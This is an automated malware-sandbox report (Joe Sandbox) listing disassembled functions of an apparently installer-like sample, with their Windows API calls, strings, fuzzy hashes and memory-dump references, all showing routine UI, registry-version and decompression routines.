API ID: A18830$A122A480A570BitsFocusObject
String ID:
API String ID: 2231653193-0
Opcode ID: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
Opcode Fuzzy Hash: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28

Function 00418C64 Relevance: 10.6, APIs: 7, Instructions: 67COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000E), ref: 00418C80
GetSystemMetrics.USER32(0000000D), ref: 00418C88
6F532980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E

Part of subcall function 004099C0: 6F52C400.COMCTL32(0049A628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4

6F59CB00.COMCTL32(0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
6F59C740.COMCTL32(00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
6F59CB00.COMCTL32(0049A628,00000001,?,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
6F530860.COMCTL32(0049A628,00418D1F,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: MetricsSystem$C400C740F530860F532980
String ID:
API String ID: 209721339-0
Opcode ID: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
Instruction ID: 436211bc77980f3f3c6a2ba6eafd8e316937a2835f40b04245610037118c4977
Opcode Fuzzy Hash: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
Instruction Fuzzy Hash: FB1149B1744204BBDB10EBA9DC83F5E73B8DB48704F6044BABA04E72D2DA799D409759

Function 00481FE0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00482098), ref: 0048207D

Strings

LanmanNT, xrefs: 00482047
WinNT, xrefs: 0048202D
ProductType, xrefs: 0048201C
ServerNT, xrefs: 00482061
System\CurrentControlSet\Control\ProductOptions, xrefs: 00482004

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseOpen
String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
API String ID: 47109696-2530820420
Opcode ID: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
Instruction ID: 2fd02ba07ad27dcdf7cb645fdb5409a97311ae270af1ac1656c6f1dc0261d506
Opcode Fuzzy Hash: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
Instruction Fuzzy Hash: 4911D030604208AADB10F6A29E02B5F7AA8DB42354F508877AA01E7292E7BE8D45D75D

Function 0041B472 Relevance: 10.6, APIs: 7, Instructions: 57windowCOMMON

Download Yara Rule

APIs

SelectObject.GDI32(00000000,?), ref: 0041B480
SelectObject.GDI32(?,00000000), ref: 0041B48F
StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
SelectObject.GDI32(?,00000000), ref: 0041B4D7
DeleteDC.GDI32(00000000), ref: 0041B4E0
DeleteDC.GDI32(?), ref: 0041B4E9

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ObjectSelect$Delete$Stretch
String ID:
API String ID: 1458357782-0
Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
Instruction ID: 28529174ed8a1a36c66279ad8c479dcd7ed434ba0fbaa502c63cdd0cc078bbc5
Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
Instruction Fuzzy Hash: A1114C72E40559ABDF10D6D9D885FAFB3BCEF08704F048456B614FB241C678A8418B54

Function 00493968 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

73A1A570.USER32(00000000,?,?,00000000), ref: 00493979

Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7

SelectObject.GDI32(00000000,00000000), ref: 0049399B
GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00493F19), ref: 004939AF
GetTextMetricsA.GDI32(00000000,?), ref: 004939D1
73A1A480.USER32(00000000,00000000,004939FB,004939F4,?,00000000,?,?,00000000), ref: 004939EE

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 004939A6

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
API String ID: 1435929781-222967699
Opcode ID: 4da94c4e869f50116a306e6e5405a5310ab38c3bec03186d5db38c66856040fc
Instruction ID: ca21cbf5bcaba7d36ec51d0fe3022430e72f204859a7c427f36f75f4196156c5
Opcode Fuzzy Hash: 4da94c4e869f50116a306e6e5405a5310ab38c3bec03186d5db38c66856040fc
Instruction Fuzzy Hash: B30165B6644644AFDB00DFA9CC42F6FB7ECDB49704F514476B504E7281D6789E008B24

Function 004233A4 Relevance: 10.6, APIs: 7, Instructions: 56threadwindowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 004233BF
WindowFromPoint.USER32(?,?), ref: 004233CC
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
GetCurrentThreadId.KERNEL32 ref: 004233E1
SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
SetCursor.USER32(00000000), ref: 00423423

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
Opcode Fuzzy Hash: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD

Function 004019CC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C

Strings

l3w, xrefs: 00401A0E
H=w, xrefs: 00401A24, 00401A29, 00401A37

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID: H=w$l3w
API String ID: 730355536-1292453710
Opcode ID: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
Instruction ID: b5067cfae5201e79e85213ffc863b03902d2ba9507e13bed97c350dada6f2a02
Opcode Fuzzy Hash: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
Instruction Fuzzy Hash: 9C01C0706442405EFB19AB69980A7263ED4D79574CF11803BF840A6AF1CAFC48A0CBAF

Function 0049378C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll), ref: 0049379C
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004937A9
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004937B6

Strings

MonitorFromRect, xrefs: 004937A3
GetMonitorInfoA, xrefs: 004937B0
user32.dll, xrefs: 00493797

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
API String ID: 667068680-2254406584
Opcode ID: bc243d748a11952884276210872aa95fdf32b4a39955ab03d8a14887b4b54015
Instruction ID: addf7fefb297577c5f12cb6f7e4bbe149f94bc2dbc72dea36d33d0c0dd90845d
Opcode Fuzzy Hash: bc243d748a11952884276210872aa95fdf32b4a39955ab03d8a14887b4b54015
Instruction Fuzzy Hash: 74F0F6D274171467DA2069F60C82F7BAACCDB93762F148077BD05A7382E99D8E0542FE

Function 004571F0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457220
GetExitCodeProcess.KERNEL32(?,lI), ref: 00457241
CloseHandle.KERNEL32(?,00457274,?,?,00457A8F,00000000,00000000), ref: 00457267

Strings

GetExitCodeProcess, xrefs: 0045724A
MsgWaitForMultipleObjects, xrefs: 0045722D
lI, xrefs: 00457237, 0045723A

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseCodeExitHandleMultipleObjectsProcessWait
String ID: lI$GetExitCodeProcess$MsgWaitForMultipleObjects
API String ID: 2573145106-911929905
Opcode ID: 57667e993de5712369b0a272a04b55a8846431b558e145026f984518073022b0
Instruction ID: 5860e754879763acac88ff1443aad6da1c0af202f9247d34d09c584a8b2c0160
Opcode Fuzzy Hash: 57667e993de5712369b0a272a04b55a8846431b558e145026f984518073022b0
Instruction Fuzzy Hash: 7501A234608204AFDF20EB999D42E1A73E8EB4A714F2041F7F810D73D2DA7C9D04D658

Function 0045CDA8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(02390000,BZ2_bzDecompressInit), ref: 0045CDB1
GetProcAddress.KERNEL32(02390000,BZ2_bzDecompress), ref: 0045CDC1
GetProcAddress.KERNEL32(02390000,BZ2_bzDecompressEnd), ref: 0045CDD1

Strings

BZ2_bzDecompressInit, xrefs: 0045CDAB
BZ2_bzDecompress, xrefs: 0045CDBB
BZ2_bzDecompressEnd, xrefs: 0045CDCB

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressProc
String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
API String ID: 190572456-212574377
Opcode ID: 4e25438f18f14d5aa4b9246e441ecaa421a620dab92095c903eafcbbb7267c35
Instruction ID: 1838bd6a3fc69983aea635b8e0361122e28d55063b6a1ad71f1ff2e1482e7c5d
Opcode Fuzzy Hash: 4e25438f18f14d5aa4b9246e441ecaa421a620dab92095c903eafcbbb7267c35
Instruction Fuzzy Hash: 86F0A9B05007009FDB24DB26BEC67272AA7E7A4746F14843BD819A6263F77C045DCA5C

Function 0042E890 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30libraryloaderwindowCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,0047F8E7), ref: 0042E8A9
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E8AF
InterlockedExchange.KERNEL32(0049A668,00000001), ref: 0042E8C0

Part of subcall function 0042E820: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
Part of subcall function 0042E820: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
Part of subcall function 0042E820: InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D

ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E8D4

Strings

user32.dll, xrefs: 0042E8A4
ChangeWindowMessageFilterEx, xrefs: 0042E89F

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
String ID: ChangeWindowMessageFilterEx$user32.dll
API String ID: 142928637-2676053874
Opcode ID: 92209b350bfe604f61bd1406e785eba3252aab3c9a25e474ddb7b579c04d4a00
Instruction ID: c365c5bc722f159dc4e6bf90002f67a18111edd1cc3b7a2fef3254202be3c5aa
Opcode Fuzzy Hash: 92209b350bfe604f61bd1406e785eba3252aab3c9a25e474ddb7b579c04d4a00
Instruction Fuzzy Hash: 02E092A1341720AAEB1077B77C8AF9A2258CB11729F5C4037F180A61D2C6BD0C90CE9E

Function 004776C8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB

Strings

VerifyVersionInfoW, xrefs: 004776E5
kernel32.dll, xrefs: 004776C9
VerSetConditionMask, xrefs: 004776D5

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
API String ID: 667068680-222143506
Opcode ID: 72b63ccca095d4596e185588666964d96aa2feb47b4604f739c524890b31c532
Instruction ID: cfeeddb06e0de6ce6ebab5647243e6050a865ade16457065002c887e192085cf
Opcode Fuzzy Hash: 72b63ccca095d4596e185588666964d96aa2feb47b4604f739c524890b31c532
Instruction Fuzzy Hash: 1BC012E0245700EDDA00B7F12CC3D772558D550F24750843B705879183D77C1C008F2C

Function 0041B67C Relevance: 9.1, APIs: 6, Instructions: 144windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0041B755
73A1A570.USER32(?), ref: 0041B761
73A18830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
73A18830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: A18830$A122A26310A570Focus
String ID:
API String ID: 3906783838-0
Opcode ID: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
Opcode Fuzzy Hash: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9

Function 0041B94C Relevance: 9.1, APIs: 6, Instructions: 142windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0041BA27
73A1A570.USER32(?), ref: 0041BA33
73A18830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
73A18830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: A18830$A122A26310A570Focus
String ID:
API String ID: 3906783838-0
Opcode ID: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
Opcode Fuzzy Hash: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4

Function 0041B518 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0041B58E
73A1A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
73A24620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
73A4E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
73A4E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
73A1A480.USER32(?,?,0041B643,?,?), ref: 0041B636

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: E680$A24620A480A570Focus
String ID:
API String ID: 3709697839-0
Opcode ID: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
Opcode Fuzzy Hash: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5

Function 0045C76C Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 73COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7
SetLastError.KERNEL32(00000000,00000002,?,?,?,0045C8A4,?,00000000,0045C838,?,?,?,?,00000000), ref: 0045C816

Strings

MACHINE, xrefs: 0045C7BA
CURRENT_USER, xrefs: 0045C7AB
USERS, xrefs: 0045C7C9
CLASSES_ROOT, xrefs: 0045C79C

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

